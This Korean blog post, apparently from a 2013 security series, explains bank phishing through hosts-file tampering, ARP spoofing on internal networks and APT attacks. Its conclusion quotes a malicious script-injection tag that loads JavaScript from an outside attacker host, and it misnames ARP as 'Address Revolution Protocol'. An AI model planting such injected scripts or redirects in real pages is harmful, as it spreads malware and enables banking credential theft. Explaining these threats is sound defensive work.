[니해알] 니들이 해킹을 알어?

[니해알] 니들이 해킹을 알어? - 3부

re4lfl0w 2013-03-07 17:45:52

※ ‘니들이 해킹을 알어?’ 라는 제목에 민감한 반응을 보이시는 분들이 있을 것 같아 미리 밝혀 둡니다. 독자들을 무시하려고 하는 것이 아니라 현재의 문제점을 정확히 보여드리기 위해 약간 민감한 단어를 사용한 것입니다. 다른 뜻은 없으니 독자들의 넓은 마음으로 이해 부탁 드립니다.

지난 2부에서 현재 국내를 공격하고 있는 공격자들과 비용대비 효과와 웹 서버 해킹 방법(SQL Injection) 등에 대해서 알아 보았습니다. 이번 글에서는 SQL Injection 공격으로 웹 서버의 권한을 탈취한 후 사용자들에게 어떻게 악성코드를 유포하고 정보들을 악용하는지에 대해서 설명 하겠습니다.

Figure 1 Know your Enemy - Use 흐름도

악성코드들은 기본적으로 백신 탐지를 우회합니다. 백신은 공개되어 있기 때문에 악성코드를 배포하기 전 백신을 우회할 수 있는지 모든 테스트를 합니다.

특히 제로데이는 OS나 네트워크 장비, 애플리케이션 등 핵심 시스템의 보안 취약점이 막을 수 있는 패치가 발표되기도 전에 그 취약점을 이용해 공격을 감행하는 수법으로 가장 강력한 보안 위협입니다.

Figure 2 제로데이 생존일지

은행 피싱

첫번째로 은행을 사칭하는 피싱이 있습니다.

요즘 은행을 사칭하여 개인 사용자들의 인터넷 뱅킹 정보를 유출하려는 시도가 많이 포착되고 있습니다. 문자 메시지로 오는 경우가 많으며, 사용자들을 쉽게 속이기 위하여 ‘보안승급’이라는 단어를 사용합니다. 마치 승급을 하지 않으면 피해를 보는 것처럼 속여 피싱 사이트로 접속을 유도합니다.

또 하나의 종류로 hosts 파일을 변조하는 악성코드가 있습니다. 이것은 문자로 오는 것보다 훨씬 위험성이 높습니다. 정상적인 국민은행(www.kbstar.com)으로 접속을 하여도 다른 피싱 사이트(www.kbmtcard.com)로 연결되기 때문입니다.

Figure 4 hosts 파일 변조를 통한 은행 피싱 사이트 접속

Hosts 파일이란 DNS(Domain Name Service)를 이용하지 않고, 윈도우 OS가 인터넷 DNS보다 hosts 파일을 먼저 참조하는 기능을 이용해서 내부에 설정된 IP주소와 도메인 호스트로 접속하도록 설정하는 파일입니다.

쉽게 이야기해서 Hosts 파일에 정상적인 국민은행 사이트(www.kbstar.com)를 (www.kbmtcard.com)으로 변경한다면 국민은행으로 정상적인 접속을 하여도 공격자가 변경한 피싱 사이트인 www.kbmtcard.com 으로 접속하게 됩니다.

이런 hosts 파일 변조가 무서운 것은 사용자가 아무리 정상적인 국민은행 사이트로 접속을 하여도 hosts 파일 변조에 의해 피싱 사이트로 접속하기 때문입니다.

Figure 5 실제 은행 피싱 피해 사례 - 1

보시는 것과 같이 정상적인 국민은행 사이트(왼쪽)와 피싱사이트(오른쪽)이 거의 유사합니다. 이런 피싱들을 염두에 두지 않는다면 인터넷뱅킹 정보가 유출될 가능성도 있습니다.

Figure 6 정상 국민은행(왼쪽)과 피싱(오른쪽) 사이트

ARP Spoofing

두번째로 주소결정프로토콜(ARP, Address Revolution Protocol) Spoofing을 사용하여 같은 네트워크에 있는 사람들의 정보까지 탈취하는 방법입니다.

Figure 7 ARP Spoofing 흐름도

ARP Spoofing이란 자신을 감추고 신뢰성 있는 사람으로 변장하는 것을 의미합니다. 즉, Billy Bob과 Peggy Sue가 서로 연애 편지를 주고 받는데 공격자가 Arp Spoofing으로 연애 편지를 엿볼 수 있다는 뜻입니다. 또한 엿보는 것을 넘어서 연애 편지를 조작해서 보낼 수도 있습니다.

그렇게 된다면 Billy Bob과 Peggy Sue는 원래 사랑하던 사이였는데 조작된 연애 편지 때문에 헤어질 수도 있는 것입니다.

Figure 8 모 IT회사의 개발자망 차단 내역

이것은 모 IT 기업 개발사 내부망 장비 차단 결과입니다. 이 결과에서 보여지듯이 2주간 발생한 데이터입니다. 내부망의 사용자 PC가 단 한대라도 권한 획득을 당했을 경우 대단히 위험합니다. APT 공격이 시작 되는 것입니다.

APT란 Advanced Persistent Threat는 공격 상대를 연구한 뒤 지능적으로 접근하는 해킹 방식입니다. 예전에는 백도어라는 통칭으로 많이 쓰이던 부류들인데 갑자기 APT로 변경이 되었습니다. 기본적으로 백신을 우회할 수 있다면 APT라고 불러도 손색이 없습니다. 백신으로 막을 수 없는 위협들을 책임을 회피하기 위해 APT라는 용어를 만들었다는 보안 업계의 전문가 의견도 있었습니다.

단 2주간의 개발자망 차단 내역인데도 불구하고 APT 관련된 공격이 11건(8번)이나 있었습니다. 이 개발자망의 개발 소스는 안전할까요? 한 번 진지하게 고민해봐야 할 시점입니다.

프리서버가 활개치는 것은 무엇을 의미할까요? 혹시 게임 소스가 유출된 것은 아닐까요? 게임 개발 소스는 해당 게임의 모든 내역들이 들어있는 보물지도와도 같은 것입니다. 이것만 있다면 똑같은 게임을 그대로 만들 수가 있습니다. 현재 APT 유형의 악성코드가 국내에 대규모로 유포되고 있습니다. 공격자들은 개발자망 PC중에 단 한 대만 감염이 되어도 ARP Spoofing으로 같은 내부망에 있는 게임 서버에 접속하여 게임 개발소스를 유출할 수 있습니다.

결론

빛스캔, KAIST 사이버보안연구센터, 정보보호대학원이 공동으로 밝힌 9월 4주차 국내 보안 위협 분석 보고서에 따르면 9월 3주차에 이어 금주에도 PC에 설치되는 최종 악성코드 기능에 ARP 스푸핑 기능을 통한 웹페이지 변조 후 <script language=JavaScript src=//ewy.passinggas.net/tj.js><script>를 삽입하는 형태가 발견 되었습니다.